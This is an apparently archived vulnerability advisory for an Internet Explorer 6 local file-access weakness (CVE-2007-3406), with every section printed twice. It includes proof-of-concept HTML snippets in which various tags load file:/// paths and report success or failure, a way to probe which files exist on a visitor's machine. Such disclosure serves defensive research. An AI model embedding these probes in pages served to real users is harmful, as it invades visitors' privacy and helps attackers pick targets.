Microsoft Internet Explorer Local File Access Weakness
BID:22621
Info
Microsoft Internet Explorer Local File Access Weakness
| Bugtraq ID: | 22621 |
| Class: | Design Error |
| CVE: |
CVE-2007-3406 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 20 2007 12:00AM |
| Updated: | May 12 2015 07:34PM |
| Credit: | Rajesh Sethumadhavan is credited with discovering this vulnerability. |
| Vulnerable: |
Microsoft Internet Explorer 6.0 SP1 Microsoft Internet Explorer 6.0 |
| Not Vulnerable: | |
Discussion
Microsoft Internet Explorer Local File Access Weakness
Microsoft Internet Explorer is reportedly prone to multiple local file-access weaknesses because the application fails to properly handle HTML tags.
These issues are triggered when an attacker entices a victim user to visit a malicious website.
Initial reports stated that remote attackers may exploit these issues to gain access to local system files via Internet Explorer. This would help attackers steal confidential information and launch further attacks. This attack would occur in the context of the user visiting the malicious site.
New conflicting reports indicate that these issues result only in verifying the presence of files on a vulnerable system.
These issues affect Internet Explorer 6 on a fully patched Windows XP SP2 system; previous versions and operating systems may also be vulnerable.
Microsoft Internet Explorer is reportedly prone to multiple local file-access weaknesses because the application fails to properly handle HTML tags.
These issues are triggered when an attacker entices a victim user to visit a malicious website.
Initial reports stated that remote attackers may exploit these issues to gain access to local system files via Internet Explorer. This would help attackers steal confidential information and launch further attacks. This attack would occur in the context of the user visiting the malicious site.
New conflicting reports indicate that these issues result only in verifying the presence of files on a vulnerable system.
These issues affect Internet Explorer 6 on a fully patched Windows XP SP2 system; previous versions and operating systems may also be vulnerable.
Exploit / POC
Microsoft Internet Explorer Local File Access Weakness
An attacker may exploit these issues by enticing victims into viewing malicious HTML content.
The following proof-of-concept HTML code is available:
- Embed Tag Local file Access:
<EMBED SRC="file:///C:/example.pdf" HEIGHT=600 WIDTH=1440></EMBED>
- Object & Param Tag Local File Access:
<object type="audio/x-mid" data="file:///C:/example.mid" width="200"
height="20">
<param name="src" value="file:///C:/example.mid">
<param name="autoStart" value="true">
<param name="autoStart" value="0">
</object>
- Body Tag Local File Access:
<body background="file:///C:/example.gif" onload="alert('loading body
bgrd success')" onerror="alert('loading body bgrd error')">
- Style Tag Local File Access:
<STYLE type="text/css">BODY{background:url("file:///C:/example.gif")}
</STYLE>
- Bgsound Tag Local File Access:
<bgsound src="file:///C:/example.mid" id="soundeffect" loop=1 autostart=
"true"/>
- Input Tag Local File Access:
<form>
<input type="image" src="file:///C:/example.gif" onload="alert('loading
input success')" onerror="alert('loading input error')">
</form>
- Image Tag Local File Access:
<img src="file:///C:/example.jpg" onload="alert('loading image success')"
onerror="alert('loading image error')">
- Script Tag Local File Access:
<script src="file:///C:/example.js"></script>
An attacker may exploit these issues by enticing victims into viewing malicious HTML content.
The following proof-of-concept HTML code is available:
- Embed Tag Local file Access:
<EMBED SRC="file:///C:/example.pdf" HEIGHT=600 WIDTH=1440></EMBED>
- Object & Param Tag Local File Access:
<object type="audio/x-mid" data="file:///C:/example.mid" width="200"
height="20">
<param name="src" value="file:///C:/example.mid">
<param name="autoStart" value="true">
<param name="autoStart" value="0">
</object>
- Body Tag Local File Access:
<body background="file:///C:/example.gif" onload="alert('loading body
bgrd success')" onerror="alert('loading body bgrd error')">
- Style Tag Local File Access:
<STYLE type="text/css">BODY{background:url("file:///C:/example.gif")}
</STYLE>
- Bgsound Tag Local File Access:
<bgsound src="file:///C:/example.mid" id="soundeffect" loop=1 autostart=
"true"/>
- Input Tag Local File Access:
<form>
<input type="image" src="file:///C:/example.gif" onload="alert('loading
input success')" onerror="alert('loading input error')">
</form>
- Image Tag Local File Access:
<img src="file:///C:/example.jpg" onload="alert('loading image success')"
onerror="alert('loading image error')">
- Script Tag Local File Access:
<script src="file:///C:/example.js"></script>
Solution / Fix
Microsoft Internet Explorer Local File Access Weakness
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Microsoft Internet Explorer Local File Access Weakness
References:
References:
- Internet Explorer Homepage (Microsoft)
- Microsoft Internet Explorer Local File Accesses Vulnerability (XDisclose)